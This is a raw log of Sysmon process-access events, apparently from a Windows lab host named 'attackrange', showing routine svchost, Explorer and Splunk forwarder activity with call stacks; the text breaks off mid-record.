10341000x800000000000000013835Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:38:03.422{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013834Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:38:03.422{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013833Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:38:03.422{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013832Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:38:03.422{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013831Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:38:03.422{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013830Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:38:03.422{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013829Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:38:03.422{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013828Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:38:03.422{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013827Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:38:03.422{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013826Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:38:03.422{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013825Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:38:03.422{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013824Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:38:03.422{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013823Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:38:03.422{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013822Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:38:03.422{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013821Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:38:03.422{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013820Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:38:03.422{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013819Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:38:03.422{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013818Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:38:03.422{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013817Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:38:03.422{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013816Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:38:03.422{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013815Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:38:03.422{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013814Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:38:03.422{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013813Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:38:03.422{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013812Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:38:03.422{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013811Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:38:03.422{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013810Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:38:03.422{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013809Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:38:03.422{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013853Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:38:15.922{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4947-6000-7105-000000009A01}6636C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013852Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:38:15.922{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013851Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:38:15.922{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013850Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:38:15.922{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013849Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:38:15.922{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013848Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 